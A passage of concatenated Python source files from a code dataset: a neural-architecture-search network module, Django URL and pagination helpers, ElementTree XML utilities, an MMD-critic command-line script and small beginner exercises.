affine=False)\n        self._steps = steps\n        self._multiplier = multiplier\n\n        self._ops = nn.ModuleList()\n        self._bns = nn.ModuleList()\n        for i in range(self._steps):\n            for j in range(2 + i):\n                stride = 2 if reduction and j < 2 else 1\n                op = MixedOp(C, stride)\n                self._ops.append(op)\n\n    def forward(self, s0, s1, weights, weights_edge):\n
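\n        # (Added sketch of the edge weighting used below; not in the original\n        # source.) For intermediate node i there are C(2+i, 2) candidate pairs of\n        # input edges, and each pair weight in weights_edge is spread onto both\n        # member edges. E.g. with three incoming states (i == 1),\n        # combinations(range(3), 2) gives [(0, 1), (0, 2), (1, 2)], so edge 0\n        # accumulates the weights of pairs (0, 1) and (0, 2).\n\n        s0 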
= self.preprocess0(s0)\n s1 = self.preprocess1(s1)\n\n states = [s0, s1]\n offset = 0\n offset_tp = 0\n for i in range(self._steps):\n if weights_edge is None:\n s = sum(self._ops[offset + j](h, weights[offset + j]) for j, h in enumerate(states))\n offset += len(states)\n states.append(s)\n else:\n comb = list(combinations(list(range(i + 2)), 2))\n # print(\"combination:%d\"%i,comb)\n offset_tp_end = offset_tp + Cal_Combination_Numbers(2 + i, 2)\n # print(\"begin,end:\",offset_tp,offset_tp_end)\n w_tp = weights_edge[offset_tp:offset_tp_end]\n # print(\"weight_edge_shape:\",weights_edge.shape)\n w_tp_edge = torch.zeros(len(states), device=weights_edge.device, dtype=weights_edge.dtype)\n # print(\"w_tp_edge_shape:\",w_tp_edge.shape)\n\n for w, edges in zip(w_tp, comb):\n w_tp_edge[edges[0]] += w\n w_tp_edge[edges[1]] += w\n # print(\"w_tp_edge:\",w_tp_edge)\n\n s = sum(w_tp_edge[j] * self._ops[offset + j](h, weights[offset + j]) for j, h in enumerate(states))\n offset += len(states)\n offset_tp = offset_tp_end\n states.append(s)\n return torch.cat(states[-self._multiplier:], dim=1)\n\n\ndef Cal_Combination_Numbers(n, r):\n '''\n C_{n}^{r}\n :param m:\n :param n:\n :return:\n '''\n return int(np.math.factorial(n) / (np.math.factorial(n - r) * np.math.factorial(r)))\n\n\nclass Network(nn.Module):\n\n def __init__(self, C, num_classes, layers, criterion, steps=4, multiplier=4, stem_multiplier=3, init_arch=True):\n super(Network, self).__init__()\n self._C = C\n self._num_classes = num_classes\n self._layers = layers\n self._criterion = criterion\n self._steps = steps\n self._multiplier = multiplier\n\n self.phase = 'op_pretrain'\n self.T = 1.0\n\n C_curr = stem_multiplier * C\n self.stem0 = nn.Sequential(\n nn.Conv2d(3, C_curr // 2, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(C_curr // 2, C_curr, 3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr),\n )\n\n self.stem1 = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(C_curr, C_curr, 3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(C_curr),\n )\n\n C_prev_prev, C_prev, C_curr = C_curr, C_curr, C\n self.cells = nn.ModuleList()\n\n reduction_prev = True\n for i in range(layers):\n if i in [layers // 3, 2 * layers // 3]:\n C_curr *= 2\n reduction = True\n else:\n reduction = False\n cell = Cell(steps, multiplier, C_prev_prev, C_prev, C_curr, reduction, reduction_prev)\n reduction_prev = reduction\n self.cells += [cell]\n C_prev_prev, C_prev = C_prev, multiplier * C_curr\n\n self.global_pooling = nn.AdaptiveAvgPool2d(1)\n self.lastact = nn.Sequential(nn.BatchNorm2d(C_prev), nn.ReLU(inplace=True))\n self.classifier = nn.Linear(C_prev, num_classes)\n if init_arch:\n self._initialize_alphas()\n\n def new(self):\n model_new = Network(self._C, self._num_classes, self._layers, self._criterion).cuda()\n for x, y in zip(model_new.arch_parameters(), self.arch_parameters()):\n x.data.copy_(y.data)\n return model_new\n\n def parse_edge(self):\n betas_normal = self.betas_normal\n betas_reduce = self.betas_reduce\n normal_edge_dict = {}\n reduce_edge_dict = {}\n for step in range(self._steps):\n normal_edge_dict['normal_node1'] = list(F.softmax(betas_normal[0:1], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node2'] = list(F.softmax(betas_normal[1:4], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node3'] = list(F.softmax(betas_normal[4:10], dim=-1).detach().cpu().numpy())\n normal_edge_dict['normal_node4'] = list(F.softmax(betas_normal[10:20], 
dim=-1).detach().cpu().numpy())\n for step in range(self._steps):\n reduce_edge_dict['reduce_node1'] = list(F.softmax(betas_reduce[0:1], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node2'] = list(F.softmax(betas_reduce[1:4], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node3'] = list(F.softmax(betas_reduce[4:10], dim=-1).detach().cpu().numpy())\n reduce_edge_dict['reduce_node4'] = list(F.softmax(betas_reduce[10:20], dim=-1).detach().cpu().numpy())\n return normal_edge_dict, reduce_edge_dict\n\n def prune_model(self):\n k = sum(1 for i in range(self._steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n self.bool_mask_normal = torch.zeros(k, num_ops)\n self.bool_mask_reduce = torch.zeros(k, num_ops)\n\n alphas_normal_non_params = self.alphas_normal_non_params\n alphas_normal_params = self.alphas_normal_params\n alphas_reduce_non_params = self.alphas_reduce_non_params\n alphas_reduce_params = self.alphas_reduce_params\n\n for idx, weight in enumerate(alphas_normal_params):\n self.bool_mask_normal[idx, 4 + torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_normal_non_params):\n self.bool_mask_normal[idx, torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_reduce_params):\n self.bool_mask_reduce[idx, 4 + torch.argmax(weight)] = 1\n for idx, weight in enumerate(alphas_reduce_non_params):\n self.bool_mask_reduce[idx, torch.argmax(weight)] = 1\n\n self.bool_mask_normal = self.bool_mask_normal.cuda()\n self.bool_mask_reduce = self.bool_mask_reduce.cuda()\n\n # init prune model\n self.alphas_normal_balance = Variable(1e-3 * torch.zeros(k, 2).cuda(), requires_grad=True)\n self.alphas_reduce_balance = Variable(1e-3 * torch.zeros(k, 2).cuda(), requires_grad=True)\n self.betas_normal = Variable(1e-3 * torch.zeros(\n Cal_Combination_Numbers(2, 2) + Cal_Combination_Numbers(3, 2) + Cal_Combination_Numbers(4,\n 2) + Cal_Combination_Numbers(\n 5, 2)).cuda(), requires_grad=True)\n self.betas_reduce = Variable(1e-3 * torch.zeros(\n Cal_Combination_Numbers(2, 2) + Cal_Combination_Numbers(3, 2) + Cal_Combination_Numbers(4,\n 2) + Cal_Combination_Numbers(\n 5, 2)).cuda(), requires_grad=True)\n del self.alphas_normal_non_params\n del self.alphas_normal_params\n del self.alphas_reduce_non_params\n del self.alphas_reduce_params\n self._arch_parameters = [\n self.alphas_normal_balance,\n self.alphas_reduce_balance,\n self.betas_normal,\n self.betas_reduce,\n ]\n\n def forward(self, input):\n\n assert 'op' in self.phase, \"error\"\n\n weights_reduce_non_params = F.softmax(self.alphas_reduce_non_params / self.T, dim=-1)\n weights_reduce_params = F.softmax(self.alphas_reduce_params / self.T, dim=-1)\n weights_reduce = torch.cat([weights_reduce_non_params, weights_reduce_params], -1)\n\n weights_normal_non_params = F.softmax(self.alphas_normal_non_params / self.T, dim=-1)\n weights_normal_params = F.softmax(self.alphas_normal_params / self.T, dim=-1)\n weights_normal = torch.cat([weights_normal_non_params, weights_normal_params], -1)\n\n s0 = self.stem0(input)\n s1 = self.stem1(s0)\n\n for i, cell in enumerate(self.cells):\n if cell.reduction:\n weights = weights_reduce\n weights_edge = None\n else:\n weights = weights_normal\n weights_edge = None\n s0, s1 = s1, cell(s0, s1, weights, weights_edge)\n\n s1 = self.lastact(s1)\n out = self.global_pooling(s1)\n logits = self.classifier(out.view(out.size(0), -1))\n\n return logits\n\n def forward_tp(self, input):\n assert 'tp' in self.phase, \"error\"\n\n weights_reduce_balance = F.softmax(self.alphas_reduce_balance 
/ (1e-3 * self.T), dim=-1) # 1e-3 or 1e-1\n weights_reduce = torch.zeros_like(self.bool_mask_reduce)\n weights_reduce[:, :4] = self.bool_mask_reduce[:, :4] * weights_reduce_balance[:, :1]\n weights_reduce[:, 4:] = self.bool_mask_reduce[:, 4:] * weights_reduce_balance[:, 1:]\n\n weights_normal_balance = F.softmax(self.alphas_normal_balance / (1e-3 * self.T), dim=-1)\n weights_normal = torch.zeros_like(self.bool_mask_normal)\n weights_normal[:, :4] = self.bool_mask_normal[:, :4] * weights_normal_balance[:, :1]\n weights_normal[:, 4:] = self.bool_mask_normal[:, 4:] * weights_normal_balance[:, 1:]\n\n s0 = self.stem0(input)\n s1 = self.stem1(s0)\n\n for i, cell in enumerate(self.cells):\n if cell.reduction:\n weights = weights_reduce\n\n start = 1\n weights_edge = F.softmax(self.betas_reduce[0:Cal_Combination_Numbers(2, 2)] / self.T, dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 2)\n tw2 = F.softmax(self.betas_reduce[start:end] / self.T, dim=-1)\n start = end\n weights_edge = torch.cat([weights_edge, tw2], dim=0)\n\n else:\n weights = weights_normal\n\n start = 1\n weights_edge = F.softmax(self.betas_normal[0:Cal_Combination_Numbers(2, 2)] / self.T, dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 2)\n tw2 = F.softmax(self.betas_normal[start:end] / self.T, dim=-1)\n start = end\n weights_edge = torch.cat([weights_edge, tw2], dim=0)\n\n s0, s1 = s1, cell(s0, s1, weights, weights_edge)\n\n s1 = self.lastact(s1)\n out = self.global_pooling(s1)\n logits = self.classifier(out.view(out.size(0), -1))\n\n return logits\n\n def load_arch(self, state_dict):\n if 'alphas_normal_non_params' in state_dict:\n self.alphas_normal_non_params.data.copy_(state_dict[\"alphas_normal_non_params\"])\n if 'alphas_normal_params' in state_dict:\n self.alphas_normal_params.data.copy_(state_dict[\"alphas_normal_params\"])\n if 'alphas_reduce_params' in state_dict:\n self.alphas_reduce_params.data.copy_(state_dict[\"alphas_reduce_params\"])\n if 'alphas_reduce_non_params' in state_dict:\n self.alphas_reduce_non_params.data.copy_(state_dict[\"alphas_reduce_non_params\"])\n if 'alphas_normal_balance' in state_dict:\n self.alphas_normal_balance.data.copy_(state_dict[\"alphas_normal_balance\"])\n if 'alphas_reduce_balance' in state_dict:\n self.alphas_reduce_balance.data.copy_(state_dict[\"alphas_reduce_balance\"])\n if 'betas_normal' in state_dict:\n self.betas_normal.data.copy_(state_dict[\"betas_normal\"])\n if 'betas_reduce' in state_dict:\n self.betas_reduce.data.copy_(state_dict[\"betas_reduce\"])\n if 'bool_mask_normal' in state_dict:\n self.bool_mask_normal.data.copy_(state_dict[\"bool_mask_normal\"])\n if 'bool_mask_reduce' in state_dict:\n self.bool_mask_reduce.data.copy_(state_dict[\"bool_mask_reduce\"])\n\n def _loss(self, input, target):\n if 'tp' in self.phase:\n logits_onehot = self.forward_oh(input)\n return self._criterion(logits_onehot, target)\n else:\n logits = self(input)\n return self._criterion(logits, target)\n\n def _initialize_alphas(self):\n k = sum(1 for i in range(self._steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n\n # hardcode params [conv3*3, conv5*5, dil3*3, dil5*5] no_params [zero, maxpool, avgpool, identity]\n\n # group weight\n self.alphas_normal_non_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n self.alphas_normal_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n\n self.alphas_reduce_non_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), 
requires_grad=True)\n self.alphas_reduce_params = Variable(1e-3 * torch.zeros(k, 4).cuda(), requires_grad=True)\n\n self._arch_parameters = [\n self.alphas_normal_non_params,\n self.alphas_normal_params,\n self.alphas_reduce_non_params,\n self.alphas_reduce_params\n ]\n\n def save_arch(self, path):\n if 'op' in self.phase:\n state_dict = {\n \"alphas_normal_non_params\": self.alphas_normal_non_params,\n \"alphas_normal_params\": self.alphas_normal_params,\n \"alphas_reduce_non_params\": self.alphas_reduce_non_params,\n \"alphas_reduce_params\": self.alphas_reduce_params\n }\n else:\n state_dict = {\n \"bool_mask_normal\": self.bool_mask_normal,\n \"bool_mask_reduce\": self.bool_mask_reduce,\n \"alphas_normal_balance\": self.alphas_normal_balance,\n \"alphas_reduce_balance\": self.alphas_reduce_balance,\n \"betas_normal\": self.betas_normal,\n \"betas_reduce\": self.betas_reduce,\n }\n torch.save(state_dict, path)\n\n def arch_parameters(self):\n return self._arch_parameters\n\n def genotype(self):\n\n def _parse_op(weights):\n gene = []\n n = 2\n start = 0\n for i in range(self._steps):\n end = start + n\n W = weights[start:end].copy()\n\n edges = sorted(range(i + 2),\n key=lambda x: -max(W[x][k] for k in range(len(W[x])) if k != PRIMITIVES.index('none')))[\n :2]\n\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j)) # geno item: (operation, node idx)\n start = end\n n += 1\n return gene\n\n def _parse_tp(weights, weights2):\n gene = []\n n = 2\n start_op = 0\n start_tp = 0\n for i in range(self._steps):\n end_op = start_op + n\n end_tp = start_tp + Cal_Combination_Numbers(2 + i, 2)\n W = weights[start_op:end_op].copy()\n W2 = weights2[start_tp:end_tp].copy()\n edges = list(combinations(list(range(2 + i)), 2))[W2.argmax()]\n\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start_tp = end_tp\n start_op = end_op\n n += 1\n return gene\n\n print(self.phase)\n if 'op' in self.phase:\n weights_reduce_non_params = F.softmax(self.alphas_reduce_non_params, dim=-1).cpu()\n weights_reduce_params = F.softmax(self.alphas_reduce_params, dim=-1).cpu()\n weights_reduce = torch.cat([weights_reduce_non_params, weights_reduce_params], -1)\n\n weights_normal_non_params = F.softmax(self.alphas_normal_non_params, dim=-1).cpu()\n weights_normal_params = F.softmax(self.alphas_normal_params, dim=-1).cpu()\n weights_normal = torch.cat([weights_normal_non_params, weights_normal_params], -1)\n\n gene_normal = _parse_op(weights_normal.data.cpu().numpy())\n gene_reduce = _parse_op(weights_reduce.data.cpu().numpy())\n\n else:\n start = 1\n weightsr2 = F.softmax(self.betas_reduce[0:Cal_Combination_Numbers(2, 2)], dim=-1)\n weightsn2 = F.softmax(self.betas_normal[0:Cal_Combination_Numbers(2, 2)], dim=-1)\n for i in range(1, self._steps):\n end = start + Cal_Combination_Numbers(2 + i, 2)\n tw2 = F.softmax(self.betas_reduce[start:end] / self.T, dim=-1)\n tn2 = F.softmax(self.betas_normal[start:end] / self.T, dim=-1)\n start = end\n weightsr2 = torch.cat([weightsr2, tw2], dim=0)\n weightsn2 = torch.cat([weightsn2, tn2], dim=0)\n\n weights_reduce_balance = F.softmax(self.alphas_reduce_balance, dim=-1)\n weights_reduce = torch.zeros_like(self.bool_mask_reduce)\n weights_reduce[:, :4] = self.bool_mask_reduce[:, :4] * 
weights_reduce_balance[:, :1]\n weights_reduce[:, 4:] = self.bool_mask_reduce[:, 4:] * weights_reduce_balance[:, 1:]\n\n weights_normal_balance = F.softmax(self.alphas_normal_balance, dim=-1)\n weights_normal = torch.zeros_like(self.bool_mask_normal)\n weights_normal[:, :4] = self.bool_mask_normal[:, :4] * weights_normal_balance[:, :1]\n weights_normal[:, 4:] = self.bool_mask_normal[:, 4:] * weights_normal_balance[:, 1:]\n\n gene_normal = _parse_tp(weights_normal.data.cpu().numpy(), weightsn2.data.cpu().numpy())\n gene_reduce = _parse_tp(weights_reduce.data.cpu().numpy(), weightsr2.data.cpu().numpy())\n\n concat = range(2 + self._steps - self._multiplier, self._steps + 2)\n genotype = Genotype(\n normal=gene_normal, normal_concat=concat,\n reduce=gene_reduce, reduce_concat=concat\n )\n return genotype, weights_normal, weights_reduce\n\n","sub_path":"pytorch/model_search_imagenet.py","file_name":"model_search_imagenet.py","file_ext":"py","file_size_in_byte":19893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"394650536","text":"#from django.conf.urls.defaults import patterns, url\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns('upload.views',\n url(r'^$', 'upload', name='upload'),\n #url(r'^(?P\\d+)$', 'uploadAssignment', name='upload_uploadassignment'),\n url(r'^showall/(?P\\d+)$', 'showAllSubmissions', name='upload_showAllSubmissions'),\n url(r'^mysubmissions/(?P\\d+)$', 'my_submissions', name='upload_mysubmissions'),\n url(r'^submission/download/(?P\\d+)$', 'submissionDownload', name='submission_downloadfile'),\n)\n","sub_path":"upload/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"151612408","text":"\"\"\"ElementTree Utilities package for NDG SOAP Package\n\nNERC DataGrid Project\n\"\"\"\n__author__ = \"P J Kershaw\"\n__date__ = \"02/04/09\"\n__copyright__ = \"(C) 2010 Science and Technology Facilities Council\"\n__license__ = \"http://www.apache.org/licenses/LICENSE-2.0\"\n__contact__ = \"Philip.Kershaw@stfc.ac.uk\"\n__revision__ = '$Id$'\ntry: # python 2.5\n from xml.etree import ElementTree\nexcept ImportError:\n # if you've installed it yourself it comes this way\n import ElementTree\n\nimport re\n\n\nclass QName(ElementTree.QName):\n \"\"\"XML Qualified Name for ElementTree\n \n Extends ElementTree implementation for improved attribute access support\n \"\"\" \n # ElementTree tag is of the form {namespace}localPart. 
getNs extracts the\n # namespace from within the brackets but if not found returns ''\n getNs = staticmethod(lambda tag: getattr(re.search('(?<=\\{).+(?=\\})', tag),\n 'group', \n str)())\n \n getLocalPart = staticmethod(lambda tag: tag.rsplit('}', 1)[-1])\n \n def __init__(self, namespaceURI, tag=None, prefix=None):\n \"\"\"Initialise a qualified name\n \n @param namespaceURI: element namespace URI\n @type namespaceURI: basestring\n @param tag: element local name\n @type tag: basestring\n @param prefix: XML namespace prefix\n @type prefix: basestring\n \"\"\"\n ElementTree.QName.__init__(self, namespaceURI, tag=tag)\n \n if tag:\n self.namespaceURI = namespaceURI\n self.localPart = tag\n else:\n self.namespaceURI = QName.getNs(namespaceURI)\n self.localPart = QName.getLocalPart(namespaceURI)\n \n self.prefix = prefix\n\n def __eq__(self, qname):\n \"\"\"Enable equality check for QName\n @type qname: ndg.security.common.utils.etree.QName\n @param qname: Qualified Name to compare with self \n @return: True if names are equal\n @rtype: bool\n \"\"\"\n if not isinstance(qname, QName):\n raise TypeError('Expecting %r; got %r' % (QName, type(qname)))\n \n return (self.prefix, self.namespaceURI, self.localPart) == \\\n (qname.prefix, qname.namespaceURI, qname.localPart)\n\n def __ne__(self, qname):\n \"\"\"Enable equality check for QName\n @type qname: ndg.security.common.utils.etree.QName\n @param qname: Qualified Name to compare with self \n @return: True if names are not equal\n @rtype: bool\n \"\"\"\n return not self.__eq__(qname)\n \n def _getPrefix(self):\n return self.__prefix\n\n def _setPrefix(self, value):\n self.__prefix = value\n \n prefix = property(_getPrefix, _setPrefix, None, \"Prefix\")\n\n def _getLocalPart(self):\n return self.__localPart\n \n def _setLocalPart(self, value):\n self.__localPart = value\n \n localPart = property(_getLocalPart, _setLocalPart, None, \"LocalPart\")\n\n def _getNamespaceURI(self):\n return self.__namespaceURI\n\n def _setNamespaceURI(self, value):\n self.__namespaceURI = value\n \n namespaceURI = property(_getNamespaceURI, _setNamespaceURI, None, \n \"Namespace URI'\")\n\n\ndef prettyPrint(*arg, **kw):\n '''Lightweight pretty printing of ElementTree elements'''\n \n # Keep track of namespace declarations made so they're not repeated\n declaredNss = []\n \n _prettyPrint = _PrettyPrint(declaredNss)\n return _prettyPrint(*arg, **kw)\n\n\nclass _PrettyPrint(object):\n def __init__(self, declaredNss):\n self.declaredNss = declaredNss\n \n @staticmethod\n def estrip(elem):\n ''' Just want to get rid of unwanted whitespace '''\n if elem is None:\n return ''\n else:\n # just in case the elem is another simple type - e.g. 
int - \n            # wrap it as a string\n            return str(elem).strip()\n    \n    def __call__(self, elem, indent='', html=0, space=' '*4):\n        '''Most of the work done in this wrapped function - wrapped so that\n        state can be maintained for declared namespace declarations during\n        recursive calls using \"declaredNss\" above''' \n        strAttribs = []\n        for attr, attrVal in elem.attrib.items():\n            nsDeclaration = ''\n            \n            attrNamespace = QName.getNs(attr)\n            if attrNamespace:\n                nsPrefix = ElementTree._namespace_map.get(attrNamespace)\n                if nsPrefix is None:\n                    raise KeyError('prettyPrint: missing namespace \"%s\" for ' \n                                   'ElementTree._namespace_map'%attrNamespace)\n                \n                attr = \"%s:%s\" % (nsPrefix, QName.getLocalPart(attr))\n                \n                if attrNamespace not in self.declaredNss:\n                    nsDeclaration = ' xmlns:%s=\"%s\"' % (nsPrefix,attrNamespace)\n                    self.declaredNss.append(attrNamespace)\n            \n            strAttribs.append('%s %s=\"%s\"' % (nsDeclaration, attr, attrVal))\n        \n        strAttrib = ''.join(strAttribs)\n        \n        namespace = QName.getNs(elem.tag)\n        nsPrefix = ElementTree._namespace_map.get(namespace)\n        if nsPrefix is None:\n            raise KeyError('prettyPrint: missing namespace \"%s\" for ' \n                           'ElementTree._namespace_map' % namespace)\n        \n        tag = \"%s:%s\" % (nsPrefix, QName.getLocalPart(elem.tag))\n        \n        # Put in namespace declaration if one doesn't already exist\n        # FIXME: namespace declaration handling is wrong for handling child\n        # element scope\n        if namespace in self.declaredNss:\n            nsDeclaration = ''\n        else:\n            nsDeclaration = ' xmlns:%s=\"%s\"' % (nsPrefix, namespace)\n            self.declaredNss.append(namespace)\n        \n        result = '%s<%s%s%s>%s' % (indent, tag, nsDeclaration, strAttrib, \n                                   _PrettyPrint.estrip(elem.text))\n        \n        children = len(elem)\n        if children:\n            for child in elem:\n                declaredNss = self.declaredNss[:]\n                _prettyPrint = _PrettyPrint(declaredNss)\n                result += '\\n'+ _prettyPrint(child, indent=indent+space) \n            \n            result += '\\n%s%s</%s>' % (indent,\n                                       _PrettyPrint.estrip(child.tail),\n                                       tag)\n        else:\n            result += '</%s>' % tag\n        \n        return result\n\n","sub_path":"ndg_soap/ndg/soap/utils/etree.py","file_name":"etree.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"334921430","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport numpy as np\nimport click\nfrom mmdcritic import MMDCritic\nfrom mmdcritic import write_outputfile\n\n\n@click.command('cli')\n@click.argument('xpath', type=click.Path(exists=True))\n@click.argument('gamma', default=0.024, type=float)\n@click.argument('m', default=10, type=int)\n@click.option('--kernel', type=click.Path(exists=True), default=None)\ndef main(xpath, gamma, m, kernel):\n    print('*** starting mmdcritic ***')\n    if kernel is not None:\n        mmd_critic = MMDCritic.from_file(xpath, gamma, kernelpath=kernel)\n    else:\n        mmd_critic = MMDCritic.from_file(xpath, gamma)\n    print('  *** getting prototypes ***')\n    prototypes = mmd_critic.select_prototypes(m)\n    print('  *** getting critics ***')\n    critics = mmd_critic.select_criticism(m)\n    write_outputfile(prototypes, 'prototypes')\n    write_outputfile(critics, 'critics')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"run/getprotocritics.py","file_name":"getprotocritics.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"265310818","text":"maandnummer = int(input('Enter a month number: '))\n\n
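# (Added sketch, not part of the original exercise.) The branching below could\n# also be written as a lookup table; SEIZOENEN is a hypothetical name:\n# SEIZOENEN = {12: 'Winter', 1: 'Winter', 2: 'Winter', 3: 'Spring', 4: 'Spring',\n#              5: 'Spring', 6: 'Summer', 7: 'Summer', 8: 'Summer', 9: 'Autumn',\n#              10: 'Autumn', 11: 'Autumn'}\n# print(SEIZOENEN.get(maandnummer, 'Enter a valid month number!'))\n\ndef seizoen(month):\n    if month 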
== 12 or 0 < month < 3:\n        print('Winter')\n    elif 2 < month < 6:\n        print('Spring')\n    elif 5 < month < 9:\n        print('Summer')\n    elif 8 < month < 12:\n        print('Autumn')\n    else:\n        print('Enter a valid month number!')\n\nseizoen(maandnummer)","sub_path":"les8/pe8_1.py","file_name":"pe8_1.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"173914578","text":"from typing import Iterable\n\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.template.response import TemplateResponse\n\n\ndef search(request, db_model_class, request_param_name, db_field_name, params_dic):\n    if request_param_name.startswith('checkbox'):\n        if request_param_name in request.POST and request.POST[request_param_name]:\n            params_dic[request_param_name] = request.POST[request_param_name]\n            value = True if request.POST[request_param_name] == 'on' else False\n            return db_model_class.filter(**{db_field_name: value})\n        elif request_param_name in request.GET and request.GET[request_param_name]:\n            params_dic[request_param_name] = request.GET[request_param_name]\n            value = True if request.GET[request_param_name] == 'on' else False\n            return db_model_class.filter(**{db_field_name: value})\n        else:\n            return db_model_class\n    else:\n        if request_param_name in request.POST and request.POST[request_param_name]:\n            params_dic[request_param_name] = request.POST[request_param_name]\n            return db_model_class.filter(**{db_field_name: request.POST[request_param_name]})\n        elif request_param_name in request.GET and request.GET[request_param_name]:\n            params_dic[request_param_name] = request.GET[request_param_name]\n            return db_model_class.filter(**{db_field_name: request.GET[request_param_name]})\n        else:\n            return db_model_class\n\n\ndef paginate(request, objects):\n    page = request.GET.get('page', 1)\n    per_page = request.POST.get('per_page', None)\n    if not per_page:\n        per_page = request.GET.get('per_page', '10')\n\n    if per_page.isdigit():\n        per_page = int(per_page)\n    else:\n        per_page = 10\n    paginator = Paginator(objects, per_page)\n    try:\n        pager = paginator.page(page)\n    except PageNotAnInteger:\n        pager = paginator.page(1)\n    except EmptyPage:\n        pager = paginator.page(paginator.num_pages)\n    return pager, pager.number, pager.paginator.per_page\n\n\ndef complex_search(request, db_model_class, **search_params):\n    params_dic = {}\n    for request_field_name, db_field_name in search_params.items():\n        db_model_class = search(request, db_model_class, request_field_name, db_field_name, params_dic)\n    return db_model_class, params_dic\n\n\ndef form_context(request, db_model_class, **kwargs):\n    if 'result_field_name' in kwargs:\n        result_field_name = kwargs['result_field_name']\n        del kwargs['result_field_name']\n    else:\n        result_field_name = 'db_objects'\n\n    if 'search_attributes' in kwargs:\n        search_attributes = kwargs['search_attributes']\n        del kwargs['search_attributes']\n    else:\n        search_attributes = {}\n\n    if 'additional_fields' in kwargs:\n        additional_fields = kwargs['additional_fields']\n        del kwargs['additional_fields']\n    else:\n        additional_fields = {}\n\n    context_data = kwargs\n    search_object, params_dic = complex_search(request, db_model_class, **search_attributes)\n    objects, page, per_page = paginate(request, search_object)\n    context_data[result_field_name] = objects.object_list\n    context_data['page'] = objects\n    context_data['page_count'] = per_page\n
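    # (Added note, not in the original.) At this point context_data holds the\n    # filtered page of objects under result_field_name, plus 'page' (the Page\n    # object) and 'page_count' (items per page); 'params' is attached below so\n    # templates can rebuild pagination links with the active filters.\n    if additional_fields:\n        params_dic.update(additional_fields)\n        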
context_data.update(additional_fields)\n context_data['params'] = params_dic\n return context_data\n\n\ndef request_paginator_form(request, template_name, db_model_class, **kwargs):\n context_data = form_context(request, db_model_class, **kwargs)\n return TemplateResponse(request, template_name, context=context_data)\n\n\ndef get_attribute_from_context(context, attribute_path, need_clean=True):\n d = {}\n if context:\n attributes = attribute_path.split('.')\n for attr in attributes:\n if context:\n if hasattr(context, attr):\n d = getattr(context, attr, {})\n elif attr in context:\n d = context[attr]\n else:\n d = None\n break\n context = d\n else:\n d = {}\n break\n if need_clean:\n d = create_clean_copy(d)\n return d\n\n\ndef create_clean_copy(iterable_element):\n if type(iterable_element) == str:\n d = iterable_element\n elif isinstance(iterable_element, dict):\n d = {k: v for k, v in iterable_element.items()}\n elif isinstance(iterable_element, set):\n d = {k for k in iterable_element}\n elif isinstance(iterable_element, Iterable):\n d = [k for k in iterable_element]\n else:\n d = iterable_element\n\n return d\n\n\ndef get_request_param(request, name, default=None, types=['GET', 'POST'], empty_as_default=True):\n result = default\n for type_ in types:\n if hasattr(request, type_):\n object_ = getattr(request, type_)\n if name in object_:\n result = object_[name]\n if not result and empty_as_default:\n result = default\n break\n return result\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"17212748","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name='blog-home'),\n path('about/', views.about, name= 'blog-about'),\n path('contact/', views.contact, name='blog-contact'),\n #path('user/register', views.register, name='user-register')\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"612929177","text":"names = ['Jeff', 'Gary', 'Jill', 'Samantha']\n\n# for name in names:\n# print('Hello there {0}!'.format(name))\n\n# print(', '.join(names))\n\nwho = 'Gary'\nhow_many = 12\n\n# Gary bought 12 apples today\nprint('{} bought {} apples today!'.format(who,how_many))\n\n","sub_path":"intermediate/stringTut.py","file_name":"stringTut.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"306445438","text":"import sys, os, tempfile, json, logging, arcpy, fnmatch, shutil, subprocess, arcgis\nfrom arcgis.gis import GIS\nimport datetime as dt\nfrom urllib import 